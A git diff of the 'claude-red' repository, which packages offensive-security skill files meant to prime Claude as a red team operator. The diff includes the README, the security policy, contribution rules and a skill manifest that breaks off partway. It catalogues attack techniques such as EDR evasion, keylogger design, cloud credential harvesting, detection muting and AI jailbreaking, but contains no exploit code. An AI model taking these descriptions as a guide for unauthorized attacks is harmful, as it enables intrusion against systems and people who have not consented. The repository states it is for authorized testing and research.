+ + + +--- + +## Detection / Defender View + + + +--- + +## Engagement Cheatsheet + + + +--- + +## Key References + +- MITRE ATT&CK / CWE / OWASP IDs +- Canonical research papers, conference talks +- Tool docs, advisory URLs +- Source: link to upstream checklist if applicable +``` + +### Style Guide + +- **Voice:** technical, second-person ("you"), present tense +- **Length:** 200–800 lines is typical; aim for depth in one surface, not breadth across many +- **Code blocks:** always specify the language (`bash`, `python`, `c`, `powershell`, `sql`, `yaml`, `http`) +- **Tables:** use for compact reference (CVE → exploitation, capability → escape, etc.) +- **No emoji** unless used as visual markers in tables (✓ ✗ ⚠) and only sparingly + +--- + +## Adding a New Skill + +1. Pick the right category folder. If none fits, propose a new one in your PR description. +2. Create `Skills///SKILL.md`. +3. Write the frontmatter and body following the structure above. +4. Update [`README.md`](README.md) — add the skill to the relevant category table. +5. Update [`CHANGELOG.md`](CHANGELOG.md) under the next version. +6. Update [`claude-skills.json`](claude-skills.json) if it exists (run `python tools/build_manifest.py` if available). +7. Run any local lint: + ```bash + ./tools/check-skill.sh Skills///SKILL.md + ``` + +## Modifying an Existing Skill + +- Preserve the `name:` field (it's a public identifier; renames are breaking changes) +- Note the edit briefly in CHANGELOG.md +- For substantive rewrites, link the prior version's SHA so reviewers can diff + +## Splitting a Monolithic Skill + +When a skill grows beyond one surface (e.g. `offensive-wifi` covering WPA2, WPA3, BLE, Zigbee), split it: + +1. Keep the original as a brief overview that points to the new focused skills +2. Move detailed content into new per-surface skills +3. Update README, CHANGELOG, and the manifest + +The roadmap in README tracks current splits. + +## Review Process + +Pull requests are reviewed for: + +- Technical accuracy (does this work? is it current?) +- Clarity (would a competent operator understand and execute?) +- Scope (one surface, not three) +- Attribution (sources cited?) +- Safety (no real targets, no live secrets, no malicious helpers) + +Expect one round of review. Maintainers may request edits before merging. + +--- + +## What We Won't Accept + +- Skills that hardcode real victim infrastructure +- Tooling that has destructive defaults without warnings +- Bypasses for vendor-mandated security telemetry without legitimate red team context +- Content under non-MIT-compatible licenses +- AI-generated skills without operator review (use Claude to draft, then verify and edit) + +--- + +## Questions + +Open a GitHub Discussion before a large PR so the maintainers can confirm the direction. For sensitive findings (a leaked credential in an example, etc.), see [SECURITY.md](SECURITY.md). diff --git a/LICENSE b/LICENSE new file mode 100644 index 0000000..53e4674 --- /dev/null +++ b/LICENSE @@ -0,0 +1,21 @@ +MIT License + +Copyright (c) 2024-2025 SnailSploit / Kai Aizen + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. diff --git a/README.md b/README.md index 7a17d74..cb88c8f 100644 --- a/README.md +++ b/README.md @@ -1,34 +1,115 @@ ![claude-red banner](/assets/banner.png) +
+ # claude-red -> 38 offensive security skills for Claude — drop-in SKILL.md files that turn Claude into a context-aware red team operator. +**Offensive security skills for Claude — drop-in `SKILL.md` files that turn Claude into a context-aware red team operator.** + +[![License: MIT](https://img.shields.io/badge/license-MIT-blue.svg)](LICENSE) +[![Skills](https://img.shields.io/badge/skills-45-red.svg)](#skill-index) +[![Categories](https://img.shields.io/badge/categories-13-orange.svg)](#categories) +[![Stars](https://img.shields.io/github/stars/SnailSploit/claude-red?style=social)](https://github.com/SnailSploit/claude-red) +[![Forks](https://img.shields.io/github/forks/SnailSploit/claude-red?style=social)](https://github.com/SnailSploit/claude-red/network/members) Built by **[SnailSploit](https://snailsploit.com)** — GenAI Security Research. +
+ --- -## What is this? +## Table of Contents + +- [What is this](#what-is-this) +- [Quickstart](#quickstart) +- [Categories](#categories) +- [Skill Index](#skill-index) + - [Web Application](#web-application) + - [Auth & Identity](#auth--identity) + - [Active Directory](#active-directory) + - [Wireless](#wireless) + - [Cloud](#cloud) + - [Mobile](#mobile) + - [IoT & Embedded](#iot--embedded) + - [Infrastructure & Red Team](#infrastructure--red-team) + - [Exploit Development](#exploit-development) + - [Fuzzing & Vulnerability Research](#fuzzing--vulnerability-research) + - [Reconnaissance](#reconnaissance) + - [AI Security](#ai-security) + - [Utility](#utility) +- [Roadmap](#roadmap) +- [Contributing](#contributing) +- [License](#license) +- [Acknowledgements](#acknowledgements) + +--- -`claude-red` is a curated library of offensive security skills designed for the [Claude skills system](https://docs.claude.com). Each skill is a structured `SKILL.md` file that primes Claude with expert-level methodology for a specific attack surface — from SQLi to shellcode, EDR evasion to exploit development. +## What is this -Drop any skill into your Claude environment and it behaves like a specialist: it knows the techniques, the tooling, the edge cases, and the escalation paths. +`claude-red` is a curated library of offensive security skills for the [Claude Skills system](https://docs.claude.com). Each skill is a structured `SKILL.md` file that primes Claude with expert-level methodology for a specific attack surface — from SQLi to shellcode, EDR evasion to ADCS abuse. + +Drop a skill into your Claude environment and it behaves like a specialist: it knows the techniques, the tooling, the edge cases, and the escalation paths. Skills load on demand based on conversational triggers — you don't pay context for skills you aren't using. + +**Use it for:** authorized red team engagements, bug bounty triage, security research, CTF preparation, training operators, and exploring attack surfaces methodically. --- -## Structure +## Quickstart + +### Claude Skills System (recommended) + +```bash +# Clone into a directory Claude will scan +git clone https://github.com/SnailSploit/claude-red ~/.claude/skills/claude-red +# Or install only one category +git clone --filter=blob:none --sparse https://github.com/SnailSploit/claude-red +cd claude-red && git sparse-checkout set Skills/web Skills/active-directory ``` -claude-red/ -└── skills-output/ - ├── offensive-sqli/ - │ └── SKILL.md - ├── offensive-xss/ - │ └── SKILL.md - └── ... (38 total) + +Claude will auto-load matching skills based on conversational triggers (e.g. mentioning SQLi loads `offensive-sqli`). + +### Claude Code + +```bash +# Point Claude at a single skill before a session +cat Skills/web/offensive-sqli/SKILL.md | claude --system-file - + +# Or load a whole category +cat Skills/active-directory/**/SKILL.md | claude --system-file - +``` + +### Claude.ai (Manual) + +Paste the contents of a `SKILL.md` into a Project's system prompt or prepend to your conversation. + +### Install Script + +```bash +./install.sh # interactive +./install.sh --target ~/.claude/skills # explicit target +./install.sh --category web # one category ``` -Each directory is a self-contained skill. Point Claude at the relevant `SKILL.md` before your engagement begins. +--- + +## Categories + +| Category | Skills | Focus | +|---|---:|---| +| [Web Application](#web-application) | 16 | OWASP Top 10 + business logic + advanced web bug classes | +| [Auth & Identity](#auth--identity) | 2 | JWT, OAuth | +| [Active Directory](#active-directory) | 1 | On-prem AD attack methodology *(expanding)* | +| [Wireless](#wireless) | 1 | 802.11, WPA2/3, EAP, BLE, Zigbee, sub-GHz *(expanding)* | +| [Cloud](#cloud) | 1 | AWS / Azure / GCP attack paths *(expanding)* | +| [Mobile](#mobile) | 1 | Android + iOS pentest *(expanding)* | +| [IoT & Embedded](#iot--embedded) | 1 | Hardware, firmware, RTOS, ICS *(expanding)* | +| [Infrastructure & Red Team](#infrastructure--red-team) | 7 | Initial access, EDR evasion, Windows ops | +| [Exploit Development](#exploit-development) | 6 | Stack/heap, mitigations, crash analysis, TOCTOU | +| [Fuzzing & VR](#fuzzing--vulnerability-research) | 4 | libFuzzer, AFL++, bug ID, vuln classes | +| [Reconnaissance](#reconnaissance) | 2 | OSINT tooling and methodology | +| [AI Security](#ai-security) | 1 | Prompt injection, jailbreaks, RAG poisoning | +| [Utility](#utility) | 2 | Fast-checking, professional reporting | --- @@ -36,103 +117,186 @@ Each directory is a self-contained skill. Point Claude at the relevant `SKILL.md ### Web Application +`Skills/web/` + | Skill | Description | |---|---| -| `offensive-sqli` | SQL Injection — union-based, blind, OOB, bypass chains | -| `offensive-xss` | Cross-Site Scripting — stored, reflected, DOM, mutation | -| `offensive-ssrf` | Server-Side Request Forgery — cloud metadata, filter bypass | -| `offensive-ssti` | Server-Side Template Injection — engine identification, RCE paths | -| `offensive-xxe` | XML External Entity Injection — OOB exfil, blind exploitation | -| `offensive-idor` | Insecure Direct Object References — enumeration, business logic | -| `offensive-file-upload` | File Upload Vulnerabilities — extension bypass, polyglots, webshells | -| `offensive-rce` | Remote Code Execution — chaining, command injection, deserialization | -| `offensive-deserialization` | Insecure Deserialization — Java, PHP, .NET gadget chains | -| `offensive-race-condition` | Race Conditions — TOCTOU, limit bypass, concurrent request attacks | -| `offensive-request-smuggling` | HTTP Request Smuggling — CL.TE, TE.CL, pipeline desync | -| `offensive-open-redirect` | Open Redirect — OAuth abuse, phishing chains, SSRF pivots | -| `offensive-parameter-pollution` | HTTP Parameter Pollution — WAF bypass, logic confusion | -| `offensive-graphql` | GraphQL Vulnerabilities — introspection, batching, IDOR via aliases | -| `offensive-waf-bypass` | WAF Bypass Techniques — encoding, chunking, case mutation | +| [`offensive-sqli`](Skills/web/offensive-sqli/SKILL.md) | SQL injection — error/blind/OOB, DB-specific, ORM CVEs, cloud paths | +| [`offensive-xss`](Skills/web/offensive-xss/SKILL.md) | Cross-site scripting — stored, reflected, DOM, mutation | +| [`offensive-ssrf`](Skills/web/offensive-ssrf/SKILL.md) | Server-side request forgery — cloud metadata, filter bypass | +| [`offensive-ssti`](Skills/web/offensive-ssti/SKILL.md) | Server-side template injection — engine ID, RCE paths | +| [`offensive-xxe`](Skills/web/offensive-xxe/SKILL.md) | XML external entity — OOB exfil, blind exploitation | +| [`offensive-idor`](Skills/web/offensive-idor/SKILL.md) | Insecure direct object references — enumeration, business logic | +| [`offensive-file-upload`](Skills/web/offensive-file-upload/SKILL.md) | File upload — extension bypass, polyglots, webshells | +| [`offensive-rce`](Skills/web/offensive-rce/SKILL.md) | Remote code execution — chaining, command injection | +| [`offensive-deserialization`](Skills/web/offensive-deserialization/SKILL.md) | Insecure deserialization — Java/PHP/.NET gadget chains | +| [`offensive-race-condition`](Skills/web/offensive-race-condition/SKILL.md) | Race conditions — TOCTOU, single-packet, limit bypass | +| [`offensive-request-smuggling`](Skills/web/offensive-request-smuggling/SKILL.md) | HTTP request smuggling — CL.TE, TE.CL, h2 desync | +| [`offensive-open-redirect`](Skills/web/offensive-open-redirect/SKILL.md) | Open redirect — OAuth abuse, phishing, SSRF pivots | +| [`offensive-parameter-pollution`](Skills/web/offensive-parameter-pollution/SKILL.md) | HTTP parameter pollution — WAF bypass, logic confusion | +| [`offensive-graphql`](Skills/web/offensive-graphql/SKILL.md) | GraphQL — introspection, batching, IDOR via aliases | +| [`offensive-waf-bypass`](Skills/web/offensive-waf-bypass/SKILL.md) | WAF bypass — encoding, chunking, case mutation | +| [`offensive-business-logic`](Skills/web/offensive-business-logic/SKILL.md) | Business logic — workflow bypass, pricing, refunds, chains | ### Auth & Identity +`Skills/auth/` + +| Skill | Description | +|---|---| +| [`offensive-jwt`](Skills/auth/offensive-jwt/SKILL.md) | JWT — alg:none, key confusion, secret cracking | +| [`offensive-oauth`](Skills/auth/offensive-oauth/SKILL.md) | OAuth — open redirect abuse, token leakage, PKCE bypass | + +### Active Directory + +`Skills/active-directory/` + +| Skill | Description | +|---|---| +| [`offensive-active-directory`](Skills/active-directory/offensive-active-directory/SKILL.md) | AD — Kerberoast, ASREProast, ACL abuse, ADCS ESC1-15, delegation, persistence, hybrid AAD | + +> **Note:** This category is being expanded. The AD overview is being split into 16 focused skills (Kerberoasting, ASREProasting, ADCS, coercion, NTLM relay, BloodHound, ticket forgery, GPO abuse, etc.). See [Roadmap](#roadmap). + +### Wireless + +`Skills/wireless/` + | Skill | Description | |---|---| -| `offensive-jwt` | JWT Security — alg:none, key confusion, secret cracking | -| `offensive-oauth` | OAuth Security Testing — open redirect abuse, token leakage, PKCE bypass | +| [`offensive-wifi`](Skills/wireless/offensive-wifi/SKILL.md) | 802.11 — WPA2/3/EAP, KARMA/Mana, KRACK, WPS, BLE, Zigbee, sub-GHz | -### Infrastructure & Binary +> **Note:** Being split into 12 focused skills. See [Roadmap](#roadmap). + +### Cloud + +`Skills/cloud/` + +| Skill | Description | +|---|---| +| [`offensive-cloud`](Skills/cloud/offensive-cloud/SKILL.md) | AWS / Azure / GCP — privesc, IMDS, cross-account, persistence, CSPM evasion | + +> **Note:** Cloud-identity (Entra/AAD/Okta hybrid) skills coming separately. See [Roadmap](#roadmap). + +### Mobile + +`Skills/mobile/` + +| Skill | Description | +|---|---| +| [`offensive-mobile`](Skills/mobile/offensive-mobile/SKILL.md) | Android + iOS — Frida, pinning, storage, biometric, deep links | + +### IoT & Embedded + +`Skills/iot/` + +| Skill | Description | +|---|---| +| [`offensive-iot`](Skills/iot/offensive-iot/SKILL.md) | Hardware recon, firmware, RTOS, ICS/OT, MQTT/CoAP | + +> **Note:** Being split into 10 focused skills (UART/JTAG, flash dump, fault injection, U-Boot, secure boot, RTOS, ICS protocols). See [Roadmap](#roadmap). + +### Infrastructure & Red Team + +`Skills/infrastructure/` | Skill | Description | |---|---| -| `offensive-shellcode` | Shellcode — writing, encoding, injection techniques | -| `offensive-edr-evasion` | EDR Evasion — unhooking, indirect syscalls, PPID spoofing | -| `offensive-exploit-development` | Exploit Development — stack/heap, ROP chains, mitigations | -| `offensive-exploit-dev-course` | Exploit Development (Course) — structured curriculum format | -| `offensive-basic-exploitation` | Basic Exploitation — Linux, mitigations disabled, beginner-to-mid | -| `offensive-crash-analysis` | Crash Analysis & Exploitability Assessment — triage, root cause | -| `offensive-mitigations` | Modern Kernel Exploit Mitigations — ASLR, CFG, CET, PAC | -| `offensive-windows-mitigations` | Windows Mitigations — ACG, Arbitrary Code Guard, exploit guard | -| `offensive-windows-boundaries` | Defeating Windows Security Boundaries — sandbox escape, privilege | -| `offensive-keylogger-arch` | Keylogger Architecture — novel research, input capture techniques | -| `offensive-patch-diffing` | Patch Diffing — binary diff, silent CVE discovery, variant hunting | -| `offensive-initial-access` | Modern Initial Access — phishing, drive-by, supply chain | -| `offensive-advanced-redteam` | Advanced Red Team Ops — full kill chain, C2, OpSec | - -### Reconnaissance & OSINT +| [`offensive-initial-access`](Skills/infrastructure/offensive-initial-access/SKILL.md) | Phishing, drive-by, supply chain — TA0001 | +| [`offensive-advanced-redteam`](Skills/infrastructure/offensive-advanced-redteam/SKILL.md) | Full kill chain, C2, OPSEC, lateral, persistence | +| [`offensive-edr-evasion`](Skills/infrastructure/offensive-edr-evasion/SKILL.md) | Unhooking, indirect syscalls, PPID spoofing | +| [`offensive-shellcode`](Skills/infrastructure/offensive-shellcode/SKILL.md) | Writing, encoding, injection techniques | +| [`offensive-keylogger-arch`](Skills/infrastructure/offensive-keylogger-arch/SKILL.md) | Keylogger architecture and input-capture techniques | +| [`offensive-windows-mitigations`](Skills/infrastructure/offensive-windows-mitigations/SKILL.md) | Windows mitigations — ACG, Arbitrary Code Guard | +| [`offensive-windows-boundaries`](Skills/infrastructure/offensive-windows-boundaries/SKILL.md) | Defeating Windows boundaries — sandbox escape, privilege | + +### Exploit Development + +`Skills/exploit-dev/` | Skill | Description | |---|---| -| `offensive-osint` | OSINT Tools — recon-ng, theHarvester, Maltego, automated pipelines | -| `offensive-osint-methodology` | OSINT Methodology — structured intelligence collection framework | +| [`offensive-exploit-development`](Skills/exploit-dev/offensive-exploit-development/SKILL.md) | Stack/heap, ROP chains, mitigations | +| [`offensive-exploit-dev-course`](Skills/exploit-dev/offensive-exploit-dev-course/SKILL.md) | Structured curriculum format | +| [`offensive-basic-exploitation`](Skills/exploit-dev/offensive-basic-exploitation/SKILL.md) | Linux exploitation, mitigations disabled — beginner-to-mid | +| [`offensive-crash-analysis`](Skills/exploit-dev/offensive-crash-analysis/SKILL.md) | Crash triage, exploitability assessment, root cause | +| [`offensive-mitigations`](Skills/exploit-dev/offensive-mitigations/SKILL.md) | Modern kernel mitigations — ASLR, CFG, CET, PAC | +| [`offensive-toctou`](Skills/exploit-dev/offensive-toctou/SKILL.md) | Time-of-check/use across binary, kernel, web, container | ### Fuzzing & Vulnerability Research +`Skills/fuzzing/` + +| Skill | Description | +|---|---| +| [`offensive-fuzzing`](Skills/fuzzing/offensive-fuzzing/SKILL.md) | libFuzzer, AFL++, coverage-guided, mutation strategies | +| [`offensive-fuzzing-course`](Skills/fuzzing/offensive-fuzzing-course/SKILL.md) | Curriculum — finding vulns via fuzzing | +| [`offensive-bug-identification`](Skills/fuzzing/offensive-bug-identification/SKILL.md) | Code review patterns, static analysis triggers | +| [`offensive-vuln-classes`](Skills/fuzzing/offensive-vuln-classes/SKILL.md) | Vulnerability classes — real-world examples, taxonomy | + +### Reconnaissance + +`Skills/recon/` + | Skill | Description | |---|---| -| `offensive-fuzzing` | Fuzzing — libFuzzer, AFL++, coverage-guided, mutation strategies | -| `offensive-fuzzing-course` | Fuzzing (Course) — structured curriculum, finding vulns via fuzzing | -| `offensive-bug-identification` | Bug Identification — code review patterns, static analysis triggers | -| `offensive-vuln-classes` | Vulnerability Classes — real-world examples, root cause taxonomy | +| [`offensive-osint`](Skills/recon/offensive-osint/SKILL.md) | OSINT tools — recon-ng, theHarvester, Maltego pipelines | +| [`offensive-osint-methodology`](Skills/recon/offensive-osint-methodology/SKILL.md) | OSINT methodology — structured intelligence collection | ### AI Security +`Skills/ai/` + | Skill | Description | |---|---| -| `offensive-ai-security` | AI Pentest — prompt injection, jailbreaking, RAG poisoning, LLM abuse | +| [`offensive-ai-security`](Skills/ai/offensive-ai-security/SKILL.md) | AI pentest — prompt injection, jailbreaking, RAG poisoning | ### Utility +`Skills/utility/` + | Skill | Description | |---|---| -| `offensive-fast-checking` | Fast Testing Checklist — rapid triage, quick win identification | +| [`offensive-fast-checking`](Skills/utility/offensive-fast-checking/SKILL.md) | Fast triage checklist — quick-win identification | +| [`offensive-reporting`](Skills/utility/offensive-reporting/SKILL.md) | Pro pentest reporting — CVSS, evidence, exec summary, retest | --- -## Usage +## Roadmap -### With Claude Code -```bash -# Point Claude at a skill before starting your session -cat skills-output/offensive-sqli/SKILL.md | claude --system-file - -``` +The library is being expanded in seven phases. Track progress in [CHANGELOG.md](CHANGELOG.md). -### With the Claude Skills System -Place any skill folder under your configured skills path (e.g., `/mnt/skills/user/`) and Claude will auto-load it based on trigger keywords. +| Phase | Category | New Skills | Status | +|---|---|---:|---| +| 1 | Internal AD/Windows (rename `active-directory/` → `internal/`) | +16 | Planned | +| 2 | Cloud Identity (Entra/AAD, ADFS, Okta, M365) | +10 | Planned | +| 3 | Wireless split (WPA2/3, EAP, BLE, Zigbee, Z-Wave, LoRa, sub-GHz) | +12 | **Mandatory** | +| 4 | IoT split (UART/JTAG, flash, fault injection, RTOS, ICS) | +10 | Planned | +| 5 | Web Basics (recon, auth bypass, access control, CSRF, headers, CORS, cache, clickjack) | +8 | Planned | +| 6 | Web Advanced (proto pollution, SAML, OIDC, WebSocket, gRPC, postMessage, SSI/ESI, CSTI) | +10 | Planned | +| 7 | Polish (README, LICENSE, manifest, install) | — | **In progress** | -### Manual (Claude.ai) -Paste the contents of any `SKILL.md` into a Project's system prompt or prepend it to your conversation. +End state: ~107 skills across the same 13+ categories. --- -## About +## Contributing + +Contributions welcome. See [CONTRIBUTING.md](CONTRIBUTING.md) for the skill template, frontmatter standard, and review process. Focused, single-surface skills are preferred over monolithic overviews. -These skills were developed through real-world red team engagements, bug bounty hunting, and security research. They encode the decision trees, tool selection logic, and escalation patterns that an experienced operator uses — not just a list of commands. +## License -**Author:** Kai Aizen (SnailSploit) — [snailsploit.com](https://snailsploit.com) -**Original Checklists:** [Sahar Shlichov](https://github.com/sahar042/offensive-checklist) — the offensive checklist collection this skill library is based on. -**License:** MIT — use freely, attribution appreciated. +[MIT](LICENSE) — use freely, attribution appreciated. + +## Acknowledgements + +- **Author:** Kai Aizen (SnailSploit) — [snailsploit.com](https://snailsploit.com) +- **Original Checklists:** [Sahar Shlichov](https://github.com/sahar042/offensive-checklist) — the offensive checklist collection many of these skills are based on. +- **Community:** PRs and feedback that keep the library current with the threat landscape. --- +
+ > *"Give Claude the right skill and it stops being a chatbot. It becomes an operator."* + +
diff --git a/SECURITY.md b/SECURITY.md index 034e848..c81b158 100644 --- a/SECURITY.md +++ b/SECURITY.md @@ -1,21 +1,63 @@ # Security Policy -## Supported Versions +`claude-red` is an offensive security tooling library. Its content describes attack methodologies for use by authorized red team operators, penetration testers, and security researchers. -Use this section to tell people about which versions of your project are -currently being supported with security updates. +## Intended Use -| Version | Supported | -| ------- | ------------------ | -| 5.1.x | :white_check_mark: | -| 5.0.x | :x: | -| 4.0.x | :white_check_mark: | -| < 4.0 | :x: | +These skills are intended for: -## Reporting a Vulnerability +- Authorized penetration testing engagements with documented scope and rules of engagement +- Bug bounty programs with explicit written permission for the techniques described +- CTF competitions and security training environments +- Independent vulnerability research with responsible disclosure -Use this section to tell people how to report a vulnerability. +These skills are **not** intended for unauthorized access to systems you do not own or do not have explicit, written permission to test. Misuse may violate computer-misuse laws in your jurisdiction (CFAA in the US, Computer Misuse Act in the UK, equivalent statutes elsewhere). -Tell them where to go, how often they can expect to get an update on a -reported vulnerability, what to expect if the vulnerability is accepted or -declined, etc. +## Reporting a Vulnerability in claude-red Itself + +If you discover a security issue in this repository — for example a malicious payload accidentally committed, a credential leaked in an example, a typosquat-prone install path, or an unsafe shell command in `install.sh` — please report it privately rather than opening a public issue. + +**Contact:** security@snailsploit.com + +Please include: + +- Affected file(s) and commit hash +- A description of the issue and its impact +- Reproduction steps if applicable +- Any suggested remediation + +We aim to acknowledge reports within 72 hours and resolve confirmed issues within 14 days. + +## Reporting a Vulnerability Found Using This Library + +If you discover a vulnerability in a third-party product or service while using `claude-red`'s methodologies, follow that vendor's responsible disclosure process. The [`offensive-reporting`](Skills/utility/offensive-reporting/SKILL.md) skill includes guidance on responsible disclosure, evidence handling, and report writing. + +If the vendor has no published security contact: + +- Try `security@`, then their PSIRT page, then `report` mailing addresses +- For ICS/OT vendors, escalate via [CISA ICS-CERT](https://www.cisa.gov/uscert/ics) +- For broad-impact bugs, request a CVE via [MITRE CNAs](https://www.cve.org/PartnerInformation/ListofPartners) +- Allow at least 90 days before public disclosure unless the vulnerability is being actively exploited + +## Supply Chain Integrity + +This repository is signed by SnailSploit. Verify commit signatures with: + +```bash +git log --show-signature +``` + +If you receive a `claude-red` archive from a third party (mirror, pastebin, package manager), verify it against the upstream repository before using. + +## Scope + +| In scope | Out of scope | +|---|---| +| Issues in repository content (skills, scripts, install logic) | Vulnerabilities in third-party tools mentioned in skills | +| Malicious payloads in examples | The Claude platform itself (report to Anthropic) | +| Unsafe installation defaults | Bugs in tools you find using this library | +| Leaked credentials in example traffic | Bugs in your own implementation of techniques described | + +## Acknowledgements + +We credit researchers who report security issues responsibly in the project [CHANGELOG](CHANGELOG.md). Let us know if you'd prefer to remain anonymous. diff --git a/claude-skills.json b/claude-skills.json new file mode 100644 index 0000000..112e1e9 --- /dev/null +++ b/claude-skills.json @@ -0,0 +1,353 @@ +{ + "name": "claude-red", + "version": "0.2.0", + "license": "MIT", + "homepage": "https://github.com/SnailSploit/claude-red", + "categories": { + "active-directory": [ + "offensive-active-directory" + ], + "ai": [ + "offensive-ai-security" + ], + "auth": [ + "offensive-jwt", + "offensive-oauth" + ], + "cloud": [ + "offensive-cloud" + ], + "exploit-dev": [ + "offensive-basic-exploitation", + "offensive-crash-analysis", + "offensive-exploit-dev-course", + "offensive-exploit-development", + "offensive-mitigations", + "offensive-toctou" + ], + "fuzzing": [ + "offensive-bug-identification", + "offensive-fuzzing", + "offensive-fuzzing-course", + "offensive-vuln-classes" + ], + "infrastructure": [ + "offensive-advanced-redteam", + "offensive-edr-evasion", + "offensive-initial-access", + "offensive-keylogger-arch", + "offensive-shellcode", + "offensive-windows-boundaries", + "offensive-windows-mitigations" + ], + "iot": [ + "offensive-iot" + ], + "mobile": [ + "offensive-mobile" + ], + "recon": [ + "offensive-osint", + "offensive-osint-methodology" + ], + "utility": [ + "offensive-fast-checking", + "offensive-reporting" + ], + "web": [ + "offensive-business-logic", + "offensive-deserialization", + "offensive-file-upload", + "offensive-graphql", + "offensive-idor", + "offensive-open-redirect", + "offensive-parameter-pollution", + "offensive-race-condition", + "offensive-rce", + "offensive-request-smuggling", + "offensive-sqli", + "offensive-ssrf", + "offensive-ssti", + "offensive-waf-bypass", + "offensive-xss", + "offensive-xxe" + ], + "wireless": [ + "offensive-wifi" + ] + }, + "skills": [ + { + "name": "offensive-active-directory", + "category": "active-directory", + "path": "Skills/active-directory/offensive-active-directory/SKILL.md", + "description": "Active Directory attack methodology for internal network red team engagements. Covers reconnaissance (BloodHound, PowerView, ADExplorer), credential abuse (Kerberoasting, ASREProasting, NTLM relay, LLMNR/NBT-NS poisoning), privilege escalation (ACL abuse, GPO abuse, unconstrained/constrained delegation), lateral movement (Pass-the-Hash, Pass-the-Ticket, Overpass-the-Hash, WMI/WinRM/PsExec), persistence (Golden/Silver/Diamond Tickets, DCSync, DCShadow, AdminSDHolder, Skeleton Key), forest trust attacks, ADCS abuse (ESC1-ESC15), and modern MDI/Defender for Identity evasion. Use when assessing on-prem AD, hybrid AD/Entra ID environments, or ADCS deployments." + }, + { + "name": "offensive-ai-security", + "category": "ai", + "path": "Skills/ai/offensive-ai-security/SKILL.md", + "description": "" + }, + { + "name": "offensive-jwt", + "category": "auth", + "path": "Skills/auth/offensive-jwt/SKILL.md", + "description": "JWT attack methodology for penetration testers. Covers algorithm confusion (alg:none, RS256→HS256), weak HMAC secret brute force, kid parameter injection (SQLi, path traversal), jku/x5u/jwk header injection, JWKS cache poisoning, JWS/JWE confusion, timing attacks, and mobile JWT storage extraction. Use when testing JWT-based authentication, hunting auth bypass via token manipulation, or evaluating JWT implementation security in web or mobile apps." + }, + { + "name": "offensive-oauth", + "category": "auth", + "path": "Skills/auth/offensive-oauth/SKILL.md", + "description": "" + }, + { + "name": "offensive-cloud", + "category": "cloud", + "path": "Skills/cloud/offensive-cloud/SKILL.md", + "description": "Cloud security attack methodology covering AWS, Azure, and GCP. Includes credential harvesting (IMDS, ~/.aws, env vars, leaked CI secrets, instance roles), enumeration with cloud-specific tools (pacu, ScoutSuite, Prowler, ROADtools, gcp_enum), privilege escalation paths (IAM PassRole, AssumeRole chains, Lambda/Functions privilege flips, Azure Owner-on-self, GCP serviceAccountTokenCreator), persistence techniques (IAM user/key creation, AAD app registration, GCP svc account key creation, EventBridge/Logic Apps backdoors), data exfiltration (S3/Blob/GCS, snapshot share, RDS/CosmosDB/Cloud SQL exfil), cloud-native lateral movement (cross-account assume, Azure AD multi-tenant, GCP project hierarchy), serverless attacks (Lambda env vars, layer hijack, Step Functions), Kubernetes-on-cloud (EKS/AKS/GKE-specific paths to node and AWS metadata), and CSPM evasion (CloudTrail blind spots, GuardDuty mute, Sentinel rule shaping). Use when the engagement scope is cloud accounts, when you've stolen cloud credentials, or when assessing cloud posture." + }, + { + "name": "offensive-basic-exploitation", + "category": "exploit-dev", + "path": "Skills/exploit-dev/offensive-basic-exploitation/SKILL.md", + "description": "" + }, + { + "name": "offensive-crash-analysis", + "category": "exploit-dev", + "path": "Skills/exploit-dev/offensive-crash-analysis/SKILL.md", + "description": "" + }, + { + "name": "offensive-exploit-dev-course", + "category": "exploit-dev", + "path": "Skills/exploit-dev/offensive-exploit-dev-course/SKILL.md", + "description": "" + }, + { + "name": "offensive-exploit-development", + "category": "exploit-dev", + "path": "Skills/exploit-dev/offensive-exploit-development/SKILL.md", + "description": "" + }, + { + "name": "offensive-mitigations", + "category": "exploit-dev", + "path": "Skills/exploit-dev/offensive-mitigations/SKILL.md", + "description": "" + }, + { + "name": "offensive-toctou", + "category": "exploit-dev", + "path": "Skills/exploit-dev/offensive-toctou/SKILL.md", + "description": "Time-of-Check / Time-of-Use (TOCTOU) race condition exploitation methodology across binary, kernel, filesystem, web, and container layers. Covers symbolic-link races (open/access/stat split), file-descriptor races, fopen/realpath traversal races, /proc and procfs races, FUSE-backed slow-fs races to widen the window, ptrace and signal races, kernel double-fetch / userspace pointer races, container/runc/symlink escape primitives, kubernetes admission/authz TOCTOU, web auth-vs-authz TOCTOU, JWT-claim TOCTOU at gateway vs service, payment/idempotency races, and modern race-amplification techniques (single-packet attack, slow loris, FUSE pause, cgroup freeze, scheduler shaping). Use when you've identified a 'check then act' pattern in code, when fuzzing for race conditions, or when exploiting concurrency bugs in privileged binaries / kernel / orchestrators." + }, + { + "name": "offensive-bug-identification", + "category": "fuzzing", + "path": "Skills/fuzzing/offensive-bug-identification/SKILL.md", + "description": "" + }, + { + "name": "offensive-fuzzing", + "category": "fuzzing", + "path": "Skills/fuzzing/offensive-fuzzing/SKILL.md", + "description": "Practical offensive fuzzing methodology covering target identification, fuzzer selection (AFL++, libFuzzer, Honggfuzz, Boofuzz, syzkaller), harness writing, corpus curation, mutation strategies, coverage measurement, and crash triage. Use when setting up or running fuzz campaigns against any target: file parsers, network protocols, kernel drivers, EDR engines, embedded firmware, or language runtimes." + }, + { + "name": "offensive-fuzzing-course", + "category": "fuzzing", + "path": "Skills/fuzzing/offensive-fuzzing-course/SKILL.md", + "description": "" + }, + { + "name": "offensive-vuln-classes", + "category": "fuzzing", + "path": "Skills/fuzzing/offensive-vuln-classes/SKILL.md", + "description": "" + }, + { + "name": "offensive-advanced-redteam", + "category": "infrastructure", + "path": 